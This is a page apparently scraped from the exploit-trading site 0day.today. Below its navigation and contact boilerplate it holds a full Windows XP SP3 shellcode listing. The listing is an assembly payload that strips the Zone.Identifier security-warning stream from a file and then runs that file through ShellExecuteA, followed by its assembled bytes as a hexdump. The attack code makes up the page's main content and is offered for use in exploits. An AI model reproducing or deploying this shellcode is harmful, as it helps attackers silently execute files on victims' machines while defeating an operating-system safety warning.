0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
win32/xp sp3 ShellExecuteA shellcode
[==================================== win32/xp sp3 ShellExecuteA shellcode ==================================== ; Author: sinn3r ; Tested on Windows XP SP3 ; Description: ; This shellcode will attempt to delete the Zone.Identifier ADS (it's a ; trick Microsoft uses to warn you about an exe when you try to run it), ; and then run the file using the ShellExecuteA function. ; Make sure the exploited app has the following components loaded ; (should be pretty common): ; KERNEL32, msvcrt, SHELL32 [BITS 32] global _start _start: push 0x00657865 push 0x2e747365 push 0x745c3a43 xor edi, edi mov edi, esp ; edi = "C:\test.exe" xor esi, esi push 0x00004154 push 0x4144243a push 0x72656966 push 0x69746e65 push 0x64492e65 push 0x6e6f5a3a mov esi, esp ; edi = fork push esi push edi xor eax, eax mov eax, 0x77C46040 ; msvcrt.strcat (Windows XP SP3) call eax xor eax, eax mov eax, 0x7c831ec5 ; KERNEL32.DeleteFileA (Windows XP SP3) call eax xor edx, edx mov word [edi + 11], dx push edx push 0x6e65706f mov edx, esp ; edx = "open" xor eax, eax push eax ; IsShown = NULL push eax ; DefDir = NULL push eax ; Parameters = NULL push edi ; Filename push edx ; Operation = "open" push eax ; hwnd = NULL mov eax, 0x7ca41150 ; SHELL32.ShellExecuteA (Windows XP SP3) call eax ; shellcode: ; sinn3r@backtrack:~$ nasm -f bin shellexecute.asm -o shellexecute | cat shellexecute |hexdump -C |grep -v 00000066 ; 00000000 68 65 78 65 00 68 65 73 74 2e 68 43 3a 5c 74 31 |hexe.hest.hC:\t1| ; 00000010 ff 89 e7 31 f6 68 54 41 00 00 68 3a 24 44 41 68 |...1.hTA..h:$DAh| ; 00000020 66 69 65 72 68 65 6e 74 69 68 65 2e 49 64 68 3a |fierhentihe.Idh:| ; 00000030 5a 6f 6e 89 e6 56 57 31 c0 b8 40 60 c4 77 ff d0 |Zon..VW1..@`.w..| ; 00000040 31 c0 b8 c5 1e 83 7c ff d0 31 d2 66 89 57 0b 52 |1.....|..1.f.W.R| ; 00000050 68 6f 70 65 6e 89 e2 31 c0 50 50 50 57 52 50 b8 |hopen..1.PPPWRP.| ; 00000060 50 11 a4 7c ff d0 |P..|..| # 0day.today [2024-11-15] #